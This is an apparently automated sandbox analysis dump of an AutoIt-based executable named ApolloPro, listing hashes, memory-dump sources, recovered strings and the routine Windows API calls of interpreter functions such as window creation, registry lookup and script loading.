                                                                                              • Opcode Fuzzy Hash: d58ffb119a715e5fea68dffaec35e4107a71e197f104d6e11c895cd3f5b7d4ca
                                                                                              • Instruction Fuzzy Hash: 5EA278706087518FD760CF18C480B6AB7E2FF85304F14996DE99A8B362DB71ED46CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf780099e7f2dff4a95100b9951845556f321eb20422ffab71e08468cbf0c194
                                                                                              • Instruction ID: 523f478b5cd7eddddaa83bd1497eab37c4a92194db9d0959d9e2e1e8b3109248
                                                                                              • Opcode Fuzzy Hash: bf780099e7f2dff4a95100b9951845556f321eb20422ffab71e08468cbf0c194
                                                                                              • Instruction Fuzzy Hash: 1022AB70A04206CFDB24DF54C490BAEB7B2FF45310F148569E95AAB381E7B0A985CFE1
                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 0063BF57
                                                                                                • Part of subcall function 006352B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006352E6
                                                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 006736B5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePeekSleepTimetime
                                                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                              • API String ID: 1792118007-922114024
                                                                                              • Opcode ID: 24a1dd767860303cfe0af0d3085da5237d08fb30c51d2525979864d0d6cf3fce
                                                                                              • Instruction ID: 16c199438266dc64f1c0c67acf4ae3d08d2d9ff5375ed340bc88c90ad07ef8c8
                                                                                              • Opcode Fuzzy Hash: 24a1dd767860303cfe0af0d3085da5237d08fb30c51d2525979864d0d6cf3fce
                                                                                              • Instruction Fuzzy Hash: DCC2CF70608341DFD768DF24C884BAAB7E6BF84300F14891DF58A9B3A1DB71E945DB86

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00633444
                                                                                              • RegisterClassExW.USER32(00000030), ref: 0063346E
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0063347F
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 0063349C
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006334AC
                                                                                              • LoadIconW.USER32(000000A9), ref: 006334C2
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006334D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: c0e62fba2785a29d720851cddfda4f17fb5bd630e9fa4142140535776838a814
                                                                                              • Instruction ID: 7de592cdaea6097dd1f3f904c99b6cadf0bc3aa92a8f882a0dd418f081e2334e
                                                                                              • Opcode Fuzzy Hash: c0e62fba2785a29d720851cddfda4f17fb5bd630e9fa4142140535776838a814
                                                                                              • Instruction Fuzzy Hash: 443147B1905309EFEB408FA4EC88BE9BBF2FB09310F10512AE551A62A0D7B51551CF90

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00633444
                                                                                              • RegisterClassExW.USER32(00000030), ref: 0063346E
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0063347F
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 0063349C
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006334AC
                                                                                              • LoadIconW.USER32(000000A9), ref: 006334C2
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006334D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                               • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: 08f366b0b29a370b2789b99065d11f9b3455830bdbdd5d30df89b0c34e50cdc3
                                                                                              • Instruction ID: 98bbac07ec6eca84500f9cd5ae039864d78bbc2998096432ff62b731b9cd9c85
                                                                                              • Opcode Fuzzy Hash: 08f366b0b29a370b2789b99065d11f9b3455830bdbdd5d30df89b0c34e50cdc3
                                                                                              • Instruction Fuzzy Hash: AF21E5B1905308EFEB009FA4EC89BADBBF6FB08710F00611AF525A62A0D7B15540CFA1

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 006500CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00643094), ref: 006500ED
                                                                                                • Part of subcall function 006508C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0064309F), ref: 006508E3
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006430E2
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 006801BA
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 006801FB
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00680239
                                                                                              • _wcscat.LIBCMT ref: 00680292
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                              • API String ID: 2673923337-2727554177
                                                                                              • Opcode ID: 2d4993322eb834f88796d9fb07e4e66282cc5178a6eef1f4da2cbaca38df8852
                                                                                              • Instruction ID: f11ae1cd459f62bfd42615895eb0348a9e8c1b3cb7ec1dfd4af9aa847acf0609
                                                                                              • Opcode Fuzzy Hash: 2d4993322eb834f88796d9fb07e4e66282cc5178a6eef1f4da2cbaca38df8852
                                                                                              • Instruction Fuzzy Hash: 0171AE715053019ED740EF25EC919ABBBEAFF46310F401A2EF545872A1EF70EA48CB96

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00645156
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00645165
                                                                                              • LoadIconW.USER32(00000063), ref: 0064517C
                                                                                              • LoadIconW.USER32(000000A4), ref: 0064518E
                                                                                              • LoadIconW.USER32(000000A2), ref: 006451A0
                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006451C6
                                                                                              • RegisterClassExW.USER32(?), ref: 0064521C
                                                                                                • Part of subcall function 00633411: GetSysColorBrush.USER32(0000000F), ref: 00633444
                                                                                                • Part of subcall function 00633411: RegisterClassExW.USER32(00000030), ref: 0063346E
                                                                                                • Part of subcall function 00633411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0063347F
                                                                                                • Part of subcall function 00633411: InitCommonControlsEx.COMCTL32(?), ref: 0063349C
                                                                                                • Part of subcall function 00633411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006334AC
                                                                                                • Part of subcall function 00633411: LoadIconW.USER32(000000A9), ref: 006334C2
                                                                                                • Part of subcall function 00633411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006334D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                              • String ID: #$0$AutoIt v3
                                                                                              • API String ID: 423443420-4155596026
                                                                                              • Opcode ID: d8e6af477ebcd35c7c8a5016e2946b7f0e4281d63308e46e1e1c95add46af4d3
                                                                                              • Instruction ID: fc170e624ace363256f60132a2d872e1b456cf03dac324c3984f10e06621cf01
                                                                                              • Opcode Fuzzy Hash: d8e6af477ebcd35c7c8a5016e2946b7f0e4281d63308e46e1e1c95add46af4d3
                                                                                              • Instruction Fuzzy Hash: 78211771D04308EFEB109FA4ED09BAD7FB6FB08725F00615AF504A62A1D7B69660CF94

                                                                                              Control-flow Graph

                                                                                              [Control-flow graph 920 for the function at 644d83 (executed/not-executed block rendering omitted); the API calls it reaches are listed below]
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00644E22
                                                                                              • KillTimer.USER32(?,00000001), ref: 00644E4C
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00644E6F
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00644E7A
                                                                                              • CreatePopupMenu.USER32 ref: 00644E8E
                                                                                              • PostQuitMessage.USER32(00000000), ref: 00644EAF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                              • String ID: TaskbarCreated
                                                                                              • API String ID: 129472671-2362178303
                                                                                              • Opcode ID: a6aaf0b98b974fddd1a0381a55613b36c12f8c984305313a2d9127c41e7fea1a
                                                                                              • Instruction ID: fa28b68a64f738b54e86717f49c2d8cc4ad070b01f5b378a0588766f37821500
                                                                                              • Opcode Fuzzy Hash: a6aaf0b98b974fddd1a0381a55613b36c12f8c984305313a2d9127c41e7fea1a
                                                                                              • Instruction Fuzzy Hash: E041083124820AABFF556F24DC4FBBE3A97F754301F002629F602922A2CF629C51E775

                                                                                              Control-flow Graph

                                                                                              [Control-flow graph 977 for the function at 63ad98 (executed/not-executed block rendering omitted); the API calls it reaches are listed below]
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0063ADE1
                                                                                              • CoUninitialize.COMBASE ref: 0063AE80
                                                                                              • UnregisterHotKey.USER32(?), ref: 0063AFD7
                                                                                              • DestroyWindow.USER32(?), ref: 00672F64
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00672FC9
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00672FF6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                              • String ID: close all
                                                                                              • API String ID: 469580280-3243417748
                                                                                              • Opcode ID: 2d4f2c98a77ef99d355b704df3185013a7791d3a0e65b165973ef60471f69aea
                                                                                              • Instruction ID: 94387de4a4e263bda3769757a8bd24fd6b7c2c59135e774ceb498c1f1a75c6fc
                                                                                              • Opcode Fuzzy Hash: 2d4f2c98a77ef99d355b704df3185013a7791d3a0e65b165973ef60471f69aea
                                                                                              • Instruction Fuzzy Hash: A6A18D30701222CFDB69EF54C895A69F3A6BF04700F1482ADE80AAB351CB31ED56DF95

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00680C5B
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              • _memset.LIBCMT ref: 00645787
                                                                                              • _wcscpy.LIBCMT ref: 006457DB
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006457EB
                                                                                              • __swprintf.LIBCMT ref: 00680CD1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                                              • String ID: Line %d: $))$AutoIt -
                                                                                              • API String ID: 230667853-2986313055
                                                                                              • Opcode ID: 25eee0c6c9b87b2f9ae49ed116572e23e19fbe68175b6bc607a70229b3239a14
                                                                                              • Instruction ID: c6d84c89d7eca7dc8ef29006c55031d434fdd12418132b937ab3b4d453e78076
                                                                                              • Opcode Fuzzy Hash: 25eee0c6c9b87b2f9ae49ed116572e23e19fbe68175b6bc607a70229b3239a14
                                                                                              • Instruction Fuzzy Hash: 0841D671008300ABD3A1FB60DC85FEF77DEAF45354F100A2EF185921A2DB34A689C79A

                                                                                              Control-flow Graph

                                                                                              [Control-flow graph 1146 for the function at 697681 (executed/not-executed block rendering omitted); the API calls it reaches are listed below]
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00697698
                                                                                                • Part of subcall function 00650FE6: std::exception::exception.LIBCMT ref: 0065101C
                                                                                                • Part of subcall function 00650FE6: __CxxThrowException@8.LIBCMT ref: 00651031
                                                                                              • ReadFile.KERNELBASE(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006976CF
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 006976EB
                                                                                              • _memmove.LIBCMT ref: 00697739
                                                                                              • _memmove.LIBCMT ref: 00697756
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00697765
                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0069777A
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00697799
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 256516436-0
                                                                                              • Opcode ID: b1f6b08a1f64a4bae5aa66c9f3f561c329b7ca7237beb3ec4eb08950dcf7f75a
                                                                                              • Instruction ID: aabb894ad473960c70baf86a449d5c285912efd1e4b04233247d07b13b7b8d90
                                                                                              • Opcode Fuzzy Hash: b1f6b08a1f64a4bae5aa66c9f3f561c329b7ca7237beb3ec4eb08950dcf7f75a
                                                                                              • Instruction Fuzzy Hash: E0316D31904205EBDF50EFA4DC85EAEB77AEF45310F1440AAED04AF256DB309A54DBA4

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 006507BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006507EC
                                                                                                • Part of subcall function 006507BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 006507F4
                                                                                                • Part of subcall function 006507BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006507FF
                                                                                                • Part of subcall function 006507BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0065080A
                                                                                                • Part of subcall function 006507BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00650812
                                                                                                • Part of subcall function 006507BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0065081A
                                                                                                • Part of subcall function 0064FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0063AC6B), ref: 0064FFA7
                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0063AD08
                                                                                              • OleInitialize.OLE32(00000000), ref: 0063AD85
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00672F56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                              • String ID: <wo$\to$so
                                                                                              • API String ID: 1986988660-3779909664
                                                                                              • Opcode ID: b72a7d7dab055c35689f2a43bd6511879f8b98218b1f33a0944d0f82795f4457
                                                                                              • Instruction ID: 9a63879a53ceafe1bf72d75e7c7b02ff6ccca1f6ff9763e0b7d21830f404c989
                                                                                              • Opcode Fuzzy Hash: b72a7d7dab055c35689f2a43bd6511879f8b98218b1f33a0944d0f82795f4457
                                                                                              • Instruction Fuzzy Hash: 5081D6B09182448EC384EF39AD446797FEBFB99304700A16ED818C7372EB704419DF58

                                                                                              Control-flow Graph: block 6450db-64514b (CreateWindowExW * 2, ShowWindow * 2)

                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00645109
                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0064512A
                                                                                              • ShowWindow.USER32(00000000), ref: 0064513E
                                                                                              • ShowWindow.USER32(00000000), ref: 00645147
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateShow
                                                                                              • String ID: AutoIt v3$edit
                                                                                              • API String ID: 1584632944-3779509399
                                                                                              • Opcode ID: c9dc233b06359723c7bfc896ee96961b18da4ee18d556425feac62cfe7c84abc
                                                                                              • Instruction ID: eb5736453179f4ca6ba9bb8f4ead6bc11bdbecc288f497d47926a39fb5a8af54
                                                                                              • Opcode Fuzzy Hash: c9dc233b06359723c7bfc896ee96961b18da4ee18d556425feac62cfe7c84abc
                                                                                              • Instruction Fuzzy Hash: ABF0B271645294BAFB311B27AC4CE372E7EE7C6F60F01211EB904A21A1C6611951DAB0

                                                                                              Control-flow Graph: entry block 699b16-699b9b (call 644a8c, call 699cf1); remaining blocks 699b9d through 699ce8-699cee, with calls to 644ab2, 65593c, 6996c4, 698f0e, 6990c1 and 652f85

                                                                                              APIs
                                                                                                • Part of subcall function 00644A8C: _fseek.LIBCMT ref: 00644AA4
                                                                                                • Part of subcall function 00699CF1: _wcscmp.LIBCMT ref: 00699DE1
                                                                                                • Part of subcall function 00699CF1: _wcscmp.LIBCMT ref: 00699DF4
                                                                                              • _free.LIBCMT ref: 00699C5F
                                                                                              • _free.LIBCMT ref: 00699C66
                                                                                              • _free.LIBCMT ref: 00699CD1
                                                                                                • Part of subcall function 00652F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00659C54,00000000,00658D5D,006559C3,?), ref: 00652F99
                                                                                                • Part of subcall function 00652F85: GetLastError.KERNEL32(00000000,?,00659C54,00000000,00658D5D,006559C3,?), ref: 00652FAB
                                                                                              • _free.LIBCMT ref: 00699CD9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                                              • API String ID: 1552873950-2806939583
                                                                                              • Opcode ID: d667cb626fb00b74fb68d7994d77ceec83bd2d54a5c47002eb39c2a452eed69d
                                                                                              • Instruction ID: b0cf008c0e2299b13f38e012d7778fc24d39644fd002b6715724ef892b155a18
                                                                                              • Opcode Fuzzy Hash: d667cb626fb00b74fb68d7994d77ceec83bd2d54a5c47002eb39c2a452eed69d
                                                                                              • Instruction Fuzzy Hash: B7513BB1904259AFDF249F64DC45AAEBBBAFF48304F10009EB649A3341DB715A84CF68

                                                                                              Control-flow Graph: entry block 650fe6-650fec; blocks through 651055-651059, with calls to 65593c, 6535d1, 6586c3, 6587cb, 658701 and 65105c

                                                                                              APIs
                                                                                                • Part of subcall function 0065593C: __FF_MSGBANNER.LIBCMT ref: 00655953
                                                                                                • Part of subcall function 0065593C: __NMSG_WRITE.LIBCMT ref: 0065595A
                                                                                                • Part of subcall function 0065593C: RtlAllocateHeap.NTDLL(00DC0000,00000000,00000001,?,?,?,?,00651003,?,0000FFFF), ref: 0065597F
                                                                                              • std::exception::exception.LIBCMT ref: 0065101C
                                                                                              • __CxxThrowException@8.LIBCMT ref: 00651031
                                                                                                • Part of subcall function 006587CB: RaiseException.KERNEL32(?,?,0000FFFF,006ECAF8,?,?,?,?,?,00651036,0000FFFF,006ECAF8,?,00000001), ref: 00658820
                                                                                              Strings
                                                                                              Memory Dump Source
